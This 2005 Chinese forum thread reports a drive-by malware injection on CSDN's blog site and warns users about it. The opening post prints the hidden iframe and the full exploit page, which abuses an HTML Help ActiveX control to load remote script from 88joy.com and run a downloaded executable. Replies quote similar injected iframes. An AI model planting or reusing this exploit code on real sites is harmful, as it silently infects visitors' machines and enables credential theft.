28,391
社区成员
发帖
与我相关
我的任务
分享CSDN竟然传播病毒! 进入http://blog.csdn.net会感染病毒!
进入http://blog.csdn.net会感染病毒!
在这一页查看HTML源代码,会发现最底下有
<iframe src=http://www.88joy.com/event/files/image/ad.htm width=0 height=0 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
这个就是传播病毒的页面!
他会下载并生成一个svchost.exe的文件,并修改C:\autoexec.bat,生成cserver.exe,并修改你的主页,还会修改注册表里的run项,每次启动时病毒就会启动!
用瑞星查瑞星不认为是病毒,但这个行为以经里病毒的行为了!
以下是http://www.88joy.com/event/files/image/ad.htm的HTML代码
<HTML><head><LINK href="ray.exe" rel=stylesheet type=text/css></head><BODY><div style="display:none"><OBJECT id="ray" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'></OBJECT><OBJECT id="raystyle" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT src=\\\"http://www.88joy.com/event/files/image/ray.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>ray.Click();setTimeout("raystyle.Click();",0);</SCRIPT></BODY></HTML>
在这一页查看HTML源代码,会发现最底下有
<iframe src=http://www.88joy.com/event/files/image/ad.htm width=0 height=0 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
这个就是传播病毒的页面!
他会下载并生成一个svchost.exe的文件,并修改C:\autoexec.bat,生成cserver.exe,并修改你的主页,还会修改注册表里的run项,每次启动时病毒就会启动!
用瑞星查瑞星不认为是病毒,但这个行为以经里病毒的行为了!
以下是http://www.88joy.com/event/files/image/ad.htm的HTML代码
<HTML><head><LINK href="ray.exe" rel=stylesheet type=text/css></head><BODY><div style="display:none"><OBJECT id="ray" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'></OBJECT><OBJECT id="raystyle" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"><PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT src=\\\"http://www.88joy.com/event/files/image/ray.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'></OBJECT></div><SCRIPT>ray.Click();setTimeout("raystyle.Click();",0);</SCRIPT></BODY></HTML>
...全文
请发表友善的回复…
发表回复
力哥 2005-05-15
- 打赏
- 举报
我的网站也被黑过!黑客先入侵系统,在主页后加入如下代码:
<iframe src="http://epe3.com/bbs/index.htm" name="hikaru" width="0" height="0" framborder="0"></iframe>
在用户打开网站首页时候,会同时打开一个宽度和高度都为0的页面,下载一个木马程序装在你的系统上。据说这个木马是专门盗QQ号码和密码的。
<iframe src="http://epe3.com/bbs/index.htm" name="hikaru" width="0" height="0" framborder="0"></iframe>
在用户打开网站首页时候,会同时打开一个宽度和高度都为0的页面,下载一个木马程序装在你的系统上。据说这个木马是专门盗QQ号码和密码的。
newsoil 2005-05-14
- 打赏
- 举报
现在是黑客的天下了。
无语~~~~~~~~
无语~~~~~~~~
pq000 2005-05-14
- 打赏
- 举报
还好
俺没中,大家要小心呀!
俺没中,大家要小心呀!
lonkil 2005-05-13
- 打赏
- 举报
可能是CSDN被人黑了!
创造奇迹9999 2005-05-13
- 打赏
- 举报
o!
M Y!
会有这种事?真是不敢相信!
M Y!
会有这种事?真是不敢相信!
lovebanyi 2005-05-12
- 打赏
- 举报
2003的也会。是adodb.stream 微软的这个补丁一直都没有出
zlnlh 2005-05-12
- 打赏
- 举报
还原了,可是怎么会这样呢?
zlnlh 2005-05-12
- 打赏
- 举报
我的首页被加入
<iframe src="http://epe3.com/bbs/index.htm" name="hikaru" width="0" height="0" framborder="0"></iframe>
<iframe src="http://epe3.com/bbs/index.htm" name="hikaru" width="0" height="0" framborder="0"></iframe>
zlnlh 2005-05-12
- 打赏
- 举报
我也中招了,怎么办呀
浏览网页弹出一个chm的窗口,然后自己又关掉了
csdn怎么会这样呀,无语。。。
浏览网页弹出一个chm的窗口,然后自己又关掉了
csdn怎么会这样呀,无语。。。
烟波湛狂蓝 2005-05-12
- 打赏
- 举报
最近一直上不去csdn blog……
jayition 2005-05-10
- 打赏
- 举报
哈哈哈,CSDN被黑,那是中国程序员的一大耻辱!加油!为我们的网络安全事业献出我们的力量!
雷霆之怒3389 2005-05-10
- 打赏
- 举报
怎么会有这种事情???
mfCVinci 2005-05-10
- 打赏
- 举报
看来这木马专门针对的是98和xp的用户?
file://C:\WINDOWS\Help\apps.chm
我一直用nt和2000,从来没把windows目录安装在C:\WINDOWS的,都是C:\WINNT -_-
file://C:\WINDOWS\Help\apps.chm
我一直用nt和2000,从来没把windows目录安装在C:\WINDOWS的,都是C:\WINNT -_-
iasky 2005-05-10
- 打赏
- 举报
blog我好久都不能登陆了,ft,说密码错误!
mfCVinci 2005-05-10
- 打赏
- 举报
谁能介绍一下这个东东的原理?
首先下载ray.exe到临时文件夹。然后运行两个htmlhelp控件,一个用来打开apps.chm,另一个运行javascript往apps.chm里面写一段它自己的script?然后调用htmlhelp控件的Click方法,触发了它自己的script里面的事件?我看它的最终目的是运行刚才下载的ray.exe,但它是怎么实现的?
我最讨厌IE的script和activex...没他们的时候世界不也是好好的-_-!
首先下载ray.exe到临时文件夹。然后运行两个htmlhelp控件,一个用来打开apps.chm,另一个运行javascript往apps.chm里面写一段它自己的script?然后调用htmlhelp控件的Click方法,触发了它自己的script里面的事件?我看它的最终目的是运行刚才下载的ray.exe,但它是怎么实现的?
我最讨厌IE的script和activex...没他们的时候世界不也是好好的-_-!
suowei1979 2005-05-10
- 打赏
- 举报
bs CSDN
wzhiyuan 2005-05-09
- 打赏
- 举报
晕,我们的网站首页前些时候也被加入类似
iframe src=http://www.88joy.com/event/files/image/ad.htm width=0 height=0 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe><iframes border>。
我不知道怎么防,就只是删除了那一行代码。汗!
后来网站就变得超慢。现在还没完全搞好。
谢谢提出问题的朋友,和提出解决办法的朋友。
iframe src=http://www.88joy.com/event/files/image/ad.htm width=0 height=0 frameborder=no border=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe><iframes border>。
我不知道怎么防,就只是删除了那一行代码。汗!
后来网站就变得超慢。现在还没完全搞好。
谢谢提出问题的朋友,和提出解决办法的朋友。
lcl118 2005-05-09
- 打赏
- 举报
mark
Venbir 2005-05-09
- 打赏
- 举报
还好我机器还是比较安全,开了http://www.88joy.com/event/files/image/ad.htm页面好像也没事!
英文版的更新比中文的的要快^_^
英文版的更新比中文的的要快^_^
zixuan221 2005-05-09
- 打赏
- 举报
好厉害的病毒呀....
加载更多回复(63)
